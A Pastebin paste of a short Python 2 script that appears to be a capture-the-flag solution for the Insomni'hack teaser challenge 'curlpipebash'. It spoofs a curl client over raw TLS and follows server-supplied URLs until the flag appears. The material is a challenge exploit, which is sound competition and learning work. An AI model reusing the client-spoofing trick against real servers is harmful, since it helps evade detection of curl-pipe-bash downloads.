Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- import ssl
- import time
- # SET VARIABLES
- reply=""
- HOST, PORT = 'curlpipebash.teaser.insomnihack.ch', 443
- url="print-flag.sh"
- while(True):
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 0)
- sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF , 0)
- wrappedSocket = ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, ciphers="ECDHE-RSA-AES128-GCM-SHA256")
- wrappedSocket.connect((HOST, PORT))
- packet = '''GET /%s HTTP/1.1
- Host: curlpipebash.teaser.insomnihack.ch
- User-Agent: curl/7.58.0
- Accept: */*
- ''' %(url)
- print packet
- wrappedSocket.send(packet)
- while("curl" not in url):
- url=wrappedSocket.recv(1024)
- print url
- time.sleep(0.5)
- url=url[url.find("ch/")+3:url.find(" ",url.find("ch/")+4)]
- data=wrappedSocket.recv(1024)
- print data
- while("0" not in data):
- time.sleep(0.5)
- data=wrappedSocket.recv(1024)
- print data
- wrappedSocket.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement